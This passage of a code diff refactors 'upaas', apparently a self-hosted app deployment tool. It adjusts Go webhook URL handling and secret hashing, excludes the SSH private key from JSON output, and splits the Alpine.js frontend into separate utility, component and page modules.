 	event.EventType = eventType
 	event.Branch = branch
 	event.CommitSHA = sql.NullString{String: commitSHA, Valid: commitSHA != ""}
-	event.CommitURL = sql.NullString{String: commitURL, Valid: commitURL != ""}
+	event.CommitURL = sql.NullString{String: commitURL.String(), Valid: commitURL != ""}
 	event.Payload = sql.NullString{String: string(payload), Valid: true}
 	event.Matched = matched
 	event.Processed = false
@@ -143,7 +144,7 @@ func (svc *Service) triggerDeployment(
 		// even if the HTTP request context is cancelled.
 		deployCtx := context.WithoutCancel(ctx)
 
-		deployErr := svc.deploy.Deploy(deployCtx, app, &eventID)
+		deployErr := svc.deploy.Deploy(deployCtx, app, &eventID, true)
 		if deployErr != nil {
 			svc.log.Error("deployment failed", "error", deployErr, "app", appName)
 		}
@@ -168,7 +169,7 @@ func extractBranch(ref string) string {
 
 // extractCommitURL extracts the commit URL from the webhook payload.
 // Prefers the URL from the head commit, falls back to constructing from repo URL.
-func extractCommitURL(payload GiteaPushPayload) string {
+func extractCommitURL(payload GiteaPushPayload) UnparsedURL {
 	// Try to find the URL from the head commit (matching After SHA)
 	for _, commit := range payload.Commits {
 		if commit.ID == payload.After && commit.URL != "" {
@@ -178,7 +179,7 @@ func extractCommitURL(payload GiteaPushPayload) string {
 
 	// Fall back to constructing URL from repo HTML URL
 	if payload.Repository.HTMLURL != "" && payload.After != "" {
-		return payload.Repository.HTMLURL + "/commit/" + payload.After
+		return UnparsedURL(payload.Repository.HTMLURL.String() + "/commit/" + payload.After)
 	}
 
 	return ""

internal/service/webhook/webhook_test.go

@@ -91,6 +91,7 @@ func createTestApp(
 	app.Branch = branch
 	app.DockerfilePath = "Dockerfile"
 	app.WebhookSecret = "webhook-secret-123"
+	app.WebhookSecretHash = database.HashWebhookSecret(app.WebhookSecret)
 	app.SSHPrivateKey = "private-key"
 	app.SSHPublicKey = "public-key"
 	app.Status = models.AppStatusPending

internal/ssh/keygen.go

@@ -12,7 +12,7 @@ import (
 
 // KeyPair contains an SSH key pair.
 type KeyPair struct {
-	PrivateKey string
+	PrivateKey string `json:"-"`
 	PublicKey  string
 }
 

static/css/input.css

@@ -57,6 +57,10 @@
     @apply inline-flex items-center justify-center px-4 py-2 rounded-md font-medium text-sm transition-all duration-200 focus:outline-none focus:ring-2 focus:ring-offset-2 disabled:opacity-50 disabled:cursor-not-allowed bg-success-500 text-white hover:bg-success-700 active:bg-green-800 focus:ring-green-500 shadow-elevation-1 hover:shadow-elevation-2;
   }
 
+  .btn-warning {
+    @apply inline-flex items-center justify-center px-4 py-2 rounded-md font-medium text-sm transition-all duration-200 focus:outline-none focus:ring-2 focus:ring-offset-2 disabled:opacity-50 disabled:cursor-not-allowed bg-warning-500 text-white hover:bg-warning-700 active:bg-orange-800 focus:ring-orange-500 shadow-elevation-1 hover:shadow-elevation-2;
+  }
+
   .btn-text {
     @apply inline-flex items-center justify-center px-4 py-2 rounded-md font-medium text-sm transition-all duration-200 focus:outline-none focus:ring-2 focus:ring-offset-2 disabled:opacity-50 disabled:cursor-not-allowed text-primary-600 hover:bg-primary-50 active:bg-primary-100;
   }

static/js/app-detail.js

@@ -0,0 +1,194 @@
+/**
+ * upaas - App Detail Page Component
+ *
+ * Handles the single-app view: status polling, container logs,
+ * build logs, and recent deployments list.
+ */
+
+document.addEventListener("alpine:init", () => {
+  Alpine.data("appDetail", (config) => ({
+    appId: config.appId,
+    currentDeploymentId: config.initialDeploymentId,
+    appStatus: config.initialStatus || "unknown",
+    containerLogs: "Loading container logs...",
+    containerStatus: "unknown",
+    buildLogs: config.initialDeploymentId
+      ? "Loading build logs..."
+      : "No deployments yet",
+    buildStatus: config.initialBuildStatus || "unknown",
+    showBuildLogs: !!config.initialDeploymentId,
+    deploying: false,
+    deployments: [],
+    // Track whether user wants auto-scroll (per log pane)
+    _containerAutoScroll: true,
+    _buildAutoScroll: true,
+    _pollTimer: null,
+
+    init() {
+      this.deploying = Alpine.store("utils").isDeploying(this.appStatus);
+      this.fetchAll();
+      this._schedulePoll();
+
+      // Set up scroll listeners after DOM is ready
+      this.$nextTick(() => {
+        this._initScrollTracking(this.$refs.containerLogsWrapper, '_containerAutoScroll');
+        this._initScrollTracking(this.$refs.buildLogsWrapper, '_buildAutoScroll');
+      });
+    },
+
+    _schedulePoll() {
+      if (this._pollTimer) clearTimeout(this._pollTimer);
+      const interval = Alpine.store("utils").isDeploying(this.appStatus) ? 1000 : 10000;
+      this._pollTimer = setTimeout(() => {
+        this.fetchAll();
+        this._schedulePoll();
+      }, interval);
+    },
+
+    _initScrollTracking(el, flag) {
+      if (!el) return;
+      el.addEventListener('scroll', () => {
+        this[flag] = Alpine.store("utils").isScrolledToBottom(el);
+      }, { passive: true });
+    },
+
+    fetchAll() {
+      this.fetchAppStatus();
+      // Only fetch logs when the respective pane is visible
+      if (this.$refs.containerLogsWrapper && this._isElementVisible(this.$refs.containerLogsWrapper)) {
+        this.fetchContainerLogs();
+      }
+      if (this.showBuildLogs && this.$refs.buildLogsWrapper && this._isElementVisible(this.$refs.buildLogsWrapper)) {
+        this.fetchBuildLogs();
+      }
+      this.fetchRecentDeployments();
+    },
+
+    _isElementVisible(el) {
+      if (!el) return false;
+      // Check if element is in viewport (roughly)
+      const rect = el.getBoundingClientRect();
+      return rect.bottom > 0 && rect.top < window.innerHeight;
+    },
+
+    async fetchAppStatus() {
+      try {
+        const res = await fetch(`/apps/${this.appId}/status`);
+        const data = await res.json();
+        const wasDeploying = this.deploying;
+        this.appStatus = data.status;
+        this.deploying = Alpine.store("utils").isDeploying(data.status);
+
+        // Re-schedule polling when deployment state changes
+        if (this.deploying !== wasDeploying) {
+          this._schedulePoll();
+        }
+
+        if (
+          data.latestDeploymentID &&
+          data.latestDeploymentID !== this.currentDeploymentId
+        ) {
+          this.currentDeploymentId = data.latestDeploymentID;
+          this.showBuildLogs = true;
+          this.fetchBuildLogs();
+        }
+      } catch (err) {
+        console.error("Status fetch error:", err);
+      }
+    },
+
+    async fetchContainerLogs() {
+      try {
+        const res = await fetch(`/apps/${this.appId}/container-logs`);
+        const data = await res.json();
+        const newLogs = data.logs || "No logs available";
+        const changed = newLogs !== this.containerLogs;
+        this.containerLogs = newLogs;
+        this.containerStatus = data.status;
+        if (changed && this._containerAutoScroll) {
+          this.$nextTick(() => {
+            Alpine.store("utils").scrollToBottom(this.$refs.containerLogsWrapper);
+          });
+        }
+      } catch (err) {
+        this.containerLogs = "Failed to fetch logs";
+      }
+    },
+
+    async fetchBuildLogs() {
+      if (!this.currentDeploymentId) return;
+      try {
+        const res = await fetch(
+          `/apps/${this.appId}/deployments/${this.currentDeploymentId}/logs`,
+        );
+        const data = await res.json();
+        const newLogs = data.logs || "No build logs available";
+        const changed = newLogs !== this.buildLogs;
+        this.buildLogs = newLogs;
+        this.buildStatus = data.status;
+        if (changed && this._buildAutoScroll) {
+          this.$nextTick(() => {
+            Alpine.store("utils").scrollToBottom(this.$refs.buildLogsWrapper);
+          });
+        }
+      } catch (err) {
+        this.buildLogs = "Failed to fetch logs";
+      }
+    },
+
+    async fetchRecentDeployments() {
+      try {
+        const res = await fetch(`/apps/${this.appId}/recent-deployments`);
+        const data = await res.json();
+        this.deployments = data.deployments || [];
+      } catch (err) {
+        console.error("Deployments fetch error:", err);
+      }
+    },
+
+    submitDeploy() {
+      this.deploying = true;
+    },
+
+    get statusBadgeClass() {
+      return Alpine.store("utils").statusBadgeClass(this.appStatus);
+    },
+
+    get statusLabel() {
+      return Alpine.store("utils").statusLabel(this.appStatus);
+    },
+
+    get containerStatusBadgeClass() {
+      return (
+        Alpine.store("utils").statusBadgeClass(this.containerStatus) +
+        " text-xs"
+      );
+    },
+
+    get containerStatusLabel() {
+      return Alpine.store("utils").statusLabel(this.containerStatus);
+    },
+
+    get buildStatusBadgeClass() {
+      return (
+        Alpine.store("utils").statusBadgeClass(this.buildStatus) + " text-xs"
+      );
+    },
+
+    get buildStatusLabel() {
+      return Alpine.store("utils").statusLabel(this.buildStatus);
+    },
+
+    deploymentStatusClass(status) {
+      return Alpine.store("utils").statusBadgeClass(status);
+    },
+
+    deploymentStatusLabel(status) {
+      return Alpine.store("utils").statusLabel(status);
+    },
+
+    formatTime(isoTime) {
+      return Alpine.store("utils").formatRelativeTime(isoTime);
+    },
+  }));
+});

static/js/app.js

@@ -1,500 +0,0 @@
-/**
- * upaas - Frontend JavaScript with Alpine.js
- */
-
-document.addEventListener("alpine:init", () => {
-  // ============================================
-  // Global Utilities Store
-  // ============================================
-  Alpine.store("utils", {
-    /**
-     * Format a date string as relative time (e.g., "5 minutes ago")
-     */
-    formatRelativeTime(dateStr) {
-      if (!dateStr) return "";
-      const date = new Date(dateStr);
-      const now = new Date();
-      const diffMs = now - date;
-      const diffSec = Math.floor(diffMs / 1000);
-      const diffMin = Math.floor(diffSec / 60);
-      const diffHour = Math.floor(diffMin / 60);
-      const diffDay = Math.floor(diffHour / 24);
-
-      if (diffSec < 60) return "just now";
-      if (diffMin < 60)
-        return diffMin + (diffMin === 1 ? " minute ago" : " minutes ago");
-      if (diffHour < 24)
-        return diffHour + (diffHour === 1 ? " hour ago" : " hours ago");
-      if (diffDay < 7)
-        return diffDay + (diffDay === 1 ? " day ago" : " days ago");
-      return date.toLocaleDateString();
-    },
-
-    /**
-     * Get the badge class for a given status
-     */
-    statusBadgeClass(status) {
-      if (status === "running" || status === "success") return "badge-success";
-      if (status === "building" || status === "deploying")
-        return "badge-warning";
-      if (status === "failed" || status === "error") return "badge-error";
-      return "badge-neutral";
-    },
-
-    /**
-     * Format status for display (capitalize first letter)
-     */
-    statusLabel(status) {
-      if (!status) return "";
-      return status.charAt(0).toUpperCase() + status.slice(1);
-    },
-
-    /**
-     * Check if status indicates active deployment
-     */
-    isDeploying(status) {
-      return status === "building" || status === "deploying";
-    },
-
-    /**
-     * Scroll an element to the bottom
-     */
-    scrollToBottom(el) {
-      if (el) {
-        // Use double RAF to ensure DOM has fully updated and reflowed
-        requestAnimationFrame(() => {
-          requestAnimationFrame(() => {
-            el.scrollTop = el.scrollHeight;
-          });
-        });
-      }
-    },
-
-    /**
-     * Copy text to clipboard
-     */
-    async copyToClipboard(text, button) {
-      try {
-        await navigator.clipboard.writeText(text);
-        return true;
-      } catch (err) {
-        // Fallback for older browsers
-        const textArea = document.createElement("textarea");
-        textArea.value = text;
-        textArea.style.position = "fixed";
-        textArea.style.left = "-9999px";
-        document.body.appendChild(textArea);
-        textArea.select();
-        try {
-          document.execCommand("copy");
-          document.body.removeChild(textArea);
-          return true;
-        } catch (e) {
-          document.body.removeChild(textArea);
-          return false;
-        }
-      }
-    },
-  });
-
-  // ============================================
-  // Copy Button Component
-  // ============================================
-  Alpine.data("copyButton", (targetId) => ({
-    copied: false,
-    async copy() {
-      const target = document.getElementById(targetId);
-      if (!target) return;
-      const text = target.textContent || target.value;
-      const success = await Alpine.store("utils").copyToClipboard(text);
-      if (success) {
-        this.copied = true;
-        setTimeout(() => {
-          this.copied = false;
-        }, 2000);
-      }
-    },
-  }));
-
-  // ============================================
-  // Confirm Action Component
-  // ============================================
-  Alpine.data("confirmAction", (message) => ({
-    confirm(event) {
-      if (!window.confirm(message)) {
-        event.preventDefault();
-      }
-    },
-  }));
-
-  // ============================================
-  // Auto-dismiss Alert Component
-  // ============================================
-  Alpine.data("autoDismiss", (delay = 5000) => ({
-    show: true,
-    init() {
-      setTimeout(() => {
-        this.dismiss();
-      }, delay);
-    },
-    dismiss() {
-      this.show = false;
-      setTimeout(() => {
-        this.$el.remove();
-      }, 300);
-    },
-  }));
-
-  // ============================================
-  // Relative Time Component
-  // ============================================
-  Alpine.data("relativeTime", (isoTime) => ({
-    display: "",
-    init() {
-      this.update();
-      // Update every minute
-      setInterval(() => this.update(), 60000);
-    },
-    update() {
-      this.display = Alpine.store("utils").formatRelativeTime(isoTime);
-    },
-  }));
-
-  // ============================================
-  // App Detail Page Component
-  // ============================================
-  Alpine.data("appDetail", (config) => ({
-    appId: config.appId,
-    currentDeploymentId: config.initialDeploymentId,
-    appStatus: config.initialStatus || "unknown",
-    containerLogs: "Loading container logs...",
-    containerStatus: "unknown",
-    buildLogs: config.initialDeploymentId
-      ? "Loading build logs..."
-      : "No deployments yet",
-    buildStatus: config.initialBuildStatus || "unknown",
-    showBuildLogs: !!config.initialDeploymentId,
-    deploying: false,
-    deployments: [],
-
-    init() {
-      this.deploying = Alpine.store("utils").isDeploying(this.appStatus);
-      this.fetchAll();
-      setInterval(() => this.fetchAll(), 1000);
-    },
-
-    fetchAll() {
-      this.fetchAppStatus();
-      this.fetchContainerLogs();
-      this.fetchBuildLogs();
-      this.fetchRecentDeployments();
-    },
-
-    async fetchAppStatus() {
-      try {
-        const res = await fetch(`/apps/${this.appId}/status`);
-        const data = await res.json();
-        this.appStatus = data.status;
-        this.deploying = Alpine.store("utils").isDeploying(data.status);
-
-        if (
-          data.latestDeploymentID &&
-          data.latestDeploymentID !== this.currentDeploymentId
-        ) {
-          this.currentDeploymentId = data.latestDeploymentID;
-          this.showBuildLogs = true;
-          this.fetchBuildLogs();
-        }
-      } catch (err) {
-        console.error("Status fetch error:", err);
-      }
-    },
-
-    async fetchContainerLogs() {
-      try {
-        const res = await fetch(`/apps/${this.appId}/container-logs`);
-        const data = await res.json();
-        this.containerLogs = data.logs || "No logs available";
-        this.containerStatus = data.status;
-        this.$nextTick(() => {
-          Alpine.store("utils").scrollToBottom(this.$refs.containerLogsWrapper);
-        });
-      } catch (err) {
-        this.containerLogs = "Failed to fetch logs";
-      }
-    },
-
-    async fetchBuildLogs() {
-      if (!this.currentDeploymentId) return;
-      try {
-        const res = await fetch(
-          `/apps/${this.appId}/deployments/${this.currentDeploymentId}/logs`,
-        );
-        const data = await res.json();
-        this.buildLogs = data.logs || "No build logs available";
-        this.buildStatus = data.status;
-        this.$nextTick(() => {
-          Alpine.store("utils").scrollToBottom(this.$refs.buildLogsWrapper);
-        });
-      } catch (err) {
-        this.buildLogs = "Failed to fetch logs";
-      }
-    },
-
-    async fetchRecentDeployments() {
-      try {
-        const res = await fetch(`/apps/${this.appId}/recent-deployments`);
-        const data = await res.json();
-        this.deployments = data.deployments || [];
-      } catch (err) {
-        console.error("Deployments fetch error:", err);
-      }
-    },
-
-    submitDeploy() {
-      this.deploying = true;
-    },
-
-    get statusBadgeClass() {
-      return Alpine.store("utils").statusBadgeClass(this.appStatus);
-    },
-
-    get statusLabel() {
-      return Alpine.store("utils").statusLabel(this.appStatus);
-    },
-
-    get containerStatusBadgeClass() {
-      return (
-        Alpine.store("utils").statusBadgeClass(this.containerStatus) +
-        " text-xs"
-      );
-    },
-
-    get containerStatusLabel() {
-      return Alpine.store("utils").statusLabel(this.containerStatus);
-    },
-
-    get buildStatusBadgeClass() {
-      return (
-        Alpine.store("utils").statusBadgeClass(this.buildStatus) + " text-xs"
-      );
-    },
-
-    get buildStatusLabel() {
-      return Alpine.store("utils").statusLabel(this.buildStatus);
-    },
-
-    deploymentStatusClass(status) {
-      return Alpine.store("utils").statusBadgeClass(status);
-    },
-
-    deploymentStatusLabel(status) {
-      return Alpine.store("utils").statusLabel(status);
-    },
-
-    formatTime(isoTime) {
-      return Alpine.store("utils").formatRelativeTime(isoTime);
-    },
-  }));
-
-  // ============================================
-  // Deployment Card Component (for individual deployment cards)
-  // ============================================
-  Alpine.data("deploymentCard", (config) => ({
-    appId: config.appId,
-    deploymentId: config.deploymentId,
-    logs: "",
-    status: config.status || "",
-    pollInterval: null,
-
-    init() {
-      // Read initial logs from script tag (avoids escaping issues)
-      const initialLogsEl = this.$el.querySelector(".initial-logs");
-      this.logs = initialLogsEl?.textContent || "Loading...";
-
-      // Only poll if deployment is in progress
-      if (Alpine.store("utils").isDeploying(this.status)) {
-        this.fetchLogs();
-        this.pollInterval = setInterval(() => this.fetchLogs(), 1000);
-      }
-    },
-
-    destroy() {
-      if (this.pollInterval) {
-        clearInterval(this.pollInterval);
-      }
-    },
-
-    async fetchLogs() {
-      try {
-        const res = await fetch(
-          `/apps/${this.appId}/deployments/${this.deploymentId}/logs`,
-        );
-        const data = await res.json();
-        const newLogs = data.logs || "No logs available";
-        const logsChanged = newLogs !== this.logs;
-        this.logs = newLogs;
-        this.status = data.status;
-
-        // Scroll to bottom only when content changes
-        if (logsChanged) {
-          this.$nextTick(() => {
-            Alpine.store("utils").scrollToBottom(this.$refs.logsWrapper);
-          });
-        }
-
-        // Stop polling if deployment is done
-        if (!Alpine.store("utils").isDeploying(data.status)) {
-          if (this.pollInterval) {
-            clearInterval(this.pollInterval);
-            this.pollInterval = null;
-          }
-          // Reload page to show final state with duration etc
-          window.location.reload();
-        }
-      } catch (err) {
-        console.error("Logs fetch error:", err);
-      }
-    },
-
-    get statusBadgeClass() {
-      return Alpine.store("utils").statusBadgeClass(this.status);
-    },
-
-    get statusLabel() {
-      return Alpine.store("utils").statusLabel(this.status);
-    },
-  }));
-
-  // ============================================
-  // Deployments History Page Component
-  // ============================================
-  Alpine.data("deploymentsPage", (config) => ({
-    appId: config.appId,
-    currentDeploymentId: null,
-    isDeploying: false,
-
-    init() {
-      // Check for in-progress deployments on page load
-      const inProgressCard = document.querySelector(
-        '[data-status="building"], [data-status="deploying"]',
-      );
-      if (inProgressCard) {
-        this.currentDeploymentId = parseInt(
-          inProgressCard.getAttribute("data-deployment-id"),
-          10,
-        );
-        this.isDeploying = true;
-      }
-
-      this.fetchAppStatus();
-      setInterval(() => this.fetchAppStatus(), 1000);
-    },
-
-    async fetchAppStatus() {
-      try {
-        const res = await fetch(`/apps/${this.appId}/status`);
-        const data = await res.json();
-        // Use deployment status, not app status - it's more reliable during transitions
-        const deploying = Alpine.store("utils").isDeploying(
-          data.latestDeploymentStatus,
-        );
-
-        // Detect new deployment
-        if (
-          data.latestDeploymentID &&
-          data.latestDeploymentID !== this.currentDeploymentId
-        ) {
-          // Check if we have a card for this deployment
-          const hasCard = document.querySelector(
-            `[data-deployment-id="${data.latestDeploymentID}"]`,
-          );
-
-          if (deploying && !hasCard) {
-            // New deployment started but no card exists - reload to show it
-            window.location.reload();
-
-            return;
-          }
-
-          this.currentDeploymentId = data.latestDeploymentID;
-        }
-
-        // Update deploying state based on latest deployment status
-        if (deploying && !this.isDeploying) {
-          this.isDeploying = true;
-        } else if (!deploying && this.isDeploying) {
-          // Deployment finished - reload to show final state
-          this.isDeploying = false;
-          window.location.reload();
-        }
-      } catch (err) {
-        console.error("Status fetch error:", err);
-      }
-    },
-
-    submitDeploy() {
-      this.isDeploying = true;
-    },
-
-    formatTime(isoTime) {
-      return Alpine.store("utils").formatRelativeTime(isoTime);
-    },
-  }));
-
-  // ============================================
-  // Dashboard Page - Relative Time Updates
-  // ============================================
-  Alpine.data("dashboard", () => ({
-    init() {
-      // Update relative times every minute
-      setInterval(() => {
-        this.$el.querySelectorAll("[data-time]").forEach((el) => {
-          const time = el.getAttribute("data-time");
-          if (time) {
-            el.textContent = Alpine.store("utils").formatRelativeTime(time);
-          }
-        });
-      }, 60000);
-    },
-  }));
-});
-
-// ============================================
-// Legacy support - expose utilities globally
-// ============================================
-window.upaas = {
-  // These are kept for backwards compatibility but templates should use Alpine.js
-  formatRelativeTime(dateStr) {
-    if (!dateStr) return "";
-    const date = new Date(dateStr);
-    const now = new Date();
-    const diffMs = now - date;
-    const diffSec = Math.floor(diffMs / 1000);
-    const diffMin = Math.floor(diffSec / 60);
-    const diffHour = Math.floor(diffMin / 60);
-    const diffDay = Math.floor(diffHour / 24);
-
-    if (diffSec < 60) return "just now";
-    if (diffMin < 60)
-      return diffMin + (diffMin === 1 ? " minute ago" : " minutes ago");
-    if (diffHour < 24)
-      return diffHour + (diffHour === 1 ? " hour ago" : " hours ago");
-    if (diffDay < 7)
-      return diffDay + (diffDay === 1 ? " day ago" : " days ago");
-    return date.toLocaleDateString();
-  },
-  // Placeholder functions - templates should migrate to Alpine.js
-  initAppDetailPage() {},
-  initDeploymentsPage() {},
-};
-
-// Update relative times on page load for non-Alpine elements
-document.addEventListener("DOMContentLoaded", () => {
-  document.querySelectorAll(".relative-time[data-time]").forEach((el) => {
-    const time = el.getAttribute("data-time");
-    if (time) {
-      el.textContent = window.upaas.formatRelativeTime(time);
-    }
-  });
-});

static/js/components.js

@@ -0,0 +1,71 @@
+/**
+ * upaas - Reusable Alpine.js Components
+ *
+ * Small, self-contained components: copy button, confirm dialog,
+ * auto-dismiss alerts, and relative time display.
+ */
+
+document.addEventListener("alpine:init", () => {
+  // ============================================
+  // Copy Button Component
+  // ============================================
+  Alpine.data("copyButton", (targetId) => ({
+    copied: false,
+    async copy() {
+      const target = document.getElementById(targetId);
+      if (!target) return;
+      const text = target.textContent || target.value;
+      const success = await Alpine.store("utils").copyToClipboard(text);
+      if (success) {
+        this.copied = true;
+        setTimeout(() => {
+          this.copied = false;
+        }, 2000);
+      }
+    },
+  }));
+
+  // ============================================
+  // Confirm Action Component
+  // ============================================
+  Alpine.data("confirmAction", (message) => ({
+    confirm(event) {
+      if (!window.confirm(message)) {
+        event.preventDefault();
+      }
+    },
+  }));
+
+  // ============================================
+  // Auto-dismiss Alert Component
+  // ============================================
+  Alpine.data("autoDismiss", (delay = 5000) => ({
+    show: true,
+    init() {
+      setTimeout(() => {
+        this.dismiss();
+      }, delay);
+    },
+    dismiss() {
+      this.show = false;
+      setTimeout(() => {
+        this.$el.remove();
+      }, 300);
+    },
+  }));
+
+  // ============================================
+  // Relative Time Component
+  // ============================================
+  Alpine.data("relativeTime", (isoTime) => ({
+    display: "",
+    init() {
+      this.update();
+      // Update every minute
+      setInterval(() => this.update(), 60000);
+    },
+    update() {
+      this.display = Alpine.store("utils").formatRelativeTime(isoTime);
+    },
+  }));
+});

static/js/dashboard.js

@@ -0,0 +1,21 @@
+/**
+ * upaas - Dashboard Page Component
+ *
+ * Periodically updates relative timestamps on the main dashboard.
+ */
+
+document.addEventListener("alpine:init", () => {
+  Alpine.data("dashboard", () => ({
+    init() {
+      // Update relative times every minute
+      setInterval(() => {
+        this.$el.querySelectorAll("[data-time]").forEach((el) => {
+          const time = el.getAttribute("data-time");
+          if (time) {
+            el.textContent = Alpine.store("utils").formatRelativeTime(time);
+          }
+        });
+      }, 60000);
+    },
+  }));
+});

static/js/deployment.js

@@ -0,0 +1,176 @@
+/**
+ * upaas - Deployment Components
+ *
+ * Deployment card (individual deployment log viewer) and
+ * deployments history page (list of all deployments).
+ */
+
+document.addEventListener("alpine:init", () => {
+  // ============================================
+  // Deployment Card Component (for individual deployment cards)
+  // ============================================
+  Alpine.data("deploymentCard", (config) => ({
+    appId: config.appId,
+    deploymentId: config.deploymentId,
+    logs: "",
+    status: config.status || "",
+    pollInterval: null,
+    _autoScroll: true,
+
+    init() {
+      // Read initial logs from script tag (avoids escaping issues)
+      const initialLogsEl = this.$el.querySelector(".initial-logs");
+      this.logs = initialLogsEl?.dataset.logs || "Loading...";
+
+      // Set up scroll tracking
+      this.$nextTick(() => {
+        const wrapper = this.$refs.logsWrapper;
+        if (wrapper) {
+          wrapper.addEventListener('scroll', () => {
+            this._autoScroll = Alpine.store("utils").isScrolledToBottom(wrapper);
+          }, { passive: true });
+        }
+      });
+
+      // Only poll if deployment is in progress
+      if (Alpine.store("utils").isDeploying(this.status)) {
+        this.fetchLogs();
+        this.pollInterval = setInterval(() => this.fetchLogs(), 1000);
+      }
+    },
+
+    destroy() {
+      if (this.pollInterval) {
+        clearInterval(this.pollInterval);
+      }
+    },
+
+    async fetchLogs() {
+      try {
+        const res = await fetch(
+          `/apps/${this.appId}/deployments/${this.deploymentId}/logs`,
+        );
+        const data = await res.json();
+        const newLogs = data.logs || "No logs available";
+        const logsChanged = newLogs !== this.logs;
+        this.logs = newLogs;
+        this.status = data.status;
+
+        // Scroll to bottom only when content changes AND user hasn't scrolled up
+        if (logsChanged && this._autoScroll) {
+          this.$nextTick(() => {
+            Alpine.store("utils").scrollToBottom(this.$refs.logsWrapper);
+          });
+        }
+
+        // Stop polling if deployment is done
+        if (!Alpine.store("utils").isDeploying(data.status)) {
+          if (this.pollInterval) {
+            clearInterval(this.pollInterval);
+            this.pollInterval = null;
+          }
+          // Reload page to show final state with duration etc
+          window.location.reload();
+        }
+      } catch (err) {
+        console.error("Logs fetch error:", err);
+      }
+    },
+
+    get statusBadgeClass() {
+      return Alpine.store("utils").statusBadgeClass(this.status);
+    },
+
+    get statusLabel() {
+      return Alpine.store("utils").statusLabel(this.status);
+    },
+  }));
+
+  // ============================================
+  // Deployments History Page Component
+  // ============================================
+  Alpine.data("deploymentsPage", (config) => ({
+    appId: config.appId,
+    currentDeploymentId: null,
+    isDeploying: false,
+
+    init() {
+      // Check for in-progress deployments on page load
+      const inProgressCard = document.querySelector(
+        '[data-status="building"], [data-status="deploying"]',
+      );
+      if (inProgressCard) {
+        this.currentDeploymentId = parseInt(
+          inProgressCard.getAttribute("data-deployment-id"),
+          10,
+        );
+        this.isDeploying = true;
+      }
+
+      this.fetchAppStatus();
+      this._scheduleStatusPoll();
+    },
+
+    _statusPollTimer: null,
+
+    _scheduleStatusPoll() {
+      if (this._statusPollTimer) clearTimeout(this._statusPollTimer);
+      const interval = this.isDeploying ? 1000 : 10000;
+      this._statusPollTimer = setTimeout(() => {
+        this.fetchAppStatus();
+        this._scheduleStatusPoll();
+      }, interval);
+    },
+
+    async fetchAppStatus() {
+      try {
+        const res = await fetch(`/apps/${this.appId}/status`);
+        const data = await res.json();
+        // Use deployment status, not app status - it's more reliable during transitions
+        const deploying = Alpine.store("utils").isDeploying(
+          data.latestDeploymentStatus,
+        );
+
+        // Detect new deployment
+        if (
+          data.latestDeploymentID &&
+          data.latestDeploymentID !== this.currentDeploymentId
+        ) {
+          // Check if we have a card for this deployment
+          const hasCard = document.querySelector(
+            `[data-deployment-id="${data.latestDeploymentID}"]`,
+          );
+
+          if (deploying && !hasCard) {
+            // New deployment started but no card exists - reload to show it
+            window.location.reload();
+
+            return;
+          }
+
+          this.currentDeploymentId = data.latestDeploymentID;
+        }
+
+        // Update deploying state based on latest deployment status
+        if (deploying && !this.isDeploying) {
+          this.isDeploying = true;
+          this._scheduleStatusPoll(); // Switch to fast polling
+        } else if (!deploying && this.isDeploying) {
+          // Deployment finished - reload to show final state
+          this.isDeploying = false;
+          window.location.reload();
+        }
+      } catch (err) {
+        console.error("Status fetch error:", err);
+      }
+    },
+
+    submitDeploy() {
+      this.isDeploying = true;
+    },
+
+    formatTime(isoTime) {
+      return Alpine.store("utils").formatRelativeTime(isoTime);
+    },
+  }));
+});

static/js/utils.js

@@ -0,0 +1,143 @@
+/**
+ * upaas - Global Utilities Store
+ *
+ * Shared formatting, status helpers, and clipboard utilities used across all pages.
+ */
+
+document.addEventListener("alpine:init", () => {
+  Alpine.store("utils", {
+    /**
+     * Format a date string as relative time (e.g., "5 minutes ago")
+     */
+    formatRelativeTime(dateStr) {
+      if (!dateStr) return "";
+      const date = new Date(dateStr);
+      const now = new Date();
+      const diffMs = now - date;
+      const diffSec = Math.floor(diffMs / 1000);
+      const diffMin = Math.floor(diffSec / 60);
+      const diffHour = Math.floor(diffMin / 60);
+      const diffDay = Math.floor(diffHour / 24);
+
+      if (diffSec < 60) return "just now";
+      if (diffMin < 60)
+        return diffMin + (diffMin === 1 ? " minute ago" : " minutes ago");
+      if (diffHour < 24)
+        return diffHour + (diffHour === 1 ? " hour ago" : " hours ago");
+      if (diffDay < 7)
+        return diffDay + (diffDay === 1 ? " day ago" : " days ago");
+      return date.toLocaleDateString();
+    },
+
+    /**
+     * Get the badge class for a given status
+     */
+    statusBadgeClass(status) {
+      if (status === "running" || status === "success") return "badge-success";
+      if (status === "building" || status === "deploying")
+        return "badge-warning";
+      if (status === "failed" || status === "error") return "badge-error";
+      return "badge-neutral";
+    },
+
+    /**
+     * Format status for display (capitalize first letter)
+     */
+    statusLabel(status) {
+      if (!status) return "";
+      return status.charAt(0).toUpperCase() + status.slice(1);
+    },
+
+    /**
+     * Check if status indicates active deployment
+     */
+    isDeploying(status) {
+      return status === "building" || status === "deploying";
+    },
+
+    /**
+     * Scroll an element to the bottom
+     */
+    scrollToBottom(el) {
+      if (el) {
+        requestAnimationFrame(() => {
+          el.scrollTop = el.scrollHeight;
+        });
+      }
+    },
+
+    /**
+     * Check if a scrollable element is at (or near) the bottom.
+     * Tolerance of 30px accounts for rounding and partial lines.
+     */
+    isScrolledToBottom(el, tolerance = 30) {
+      if (!el) return true;
+      return el.scrollHeight - el.scrollTop - el.clientHeight <= tolerance;
+    },
+
+    /**
+     * Copy text to clipboard
+     */
+    async copyToClipboard(text, button) {
+      try {
+        await navigator.clipboard.writeText(text);
+        return true;
+      } catch (err) {
+        // Fallback for older browsers
+        const textArea = document.createElement("textarea");
+        textArea.value = text;
+        textArea.style.position = "fixed";
+        textArea.style.left = "-9999px";
+        document.body.appendChild(textArea);
+        textArea.select();
+        try {
+          document.execCommand("copy");
+          document.body.removeChild(textArea);
+          return true;
+        } catch (e) {
+          document.body.removeChild(textArea);
+          return false;
+        }
+      }
+    },
+  });
+});
+
+// ============================================
+// Legacy support - expose utilities globally
+// ============================================
+window.upaas = {
+  // These are kept for backwards compatibility but templates should use Alpine.js
+  formatRelativeTime(dateStr) {
+    if (!dateStr) return "";
+    const date = new Date(dateStr);
+    const now = new Date();
+    const diffMs = now - date;
+    const diffSec = Math.floor(diffMs / 1000);
+    const diffMin = Math.floor(diffSec / 60);
+    const diffHour = Math.floor(diffMin / 60);
+    const diffDay = Math.floor(diffHour / 24);
+
+    if (diffSec < 60) return "just now";
+    if (diffMin < 60)
+      return diffMin + (diffMin === 1 ? " minute ago" : " minutes ago");
+    if (diffHour < 24)
+      return diffHour + (diffHour === 1 ? " hour ago" : " hours ago");
+    if (diffDay < 7)
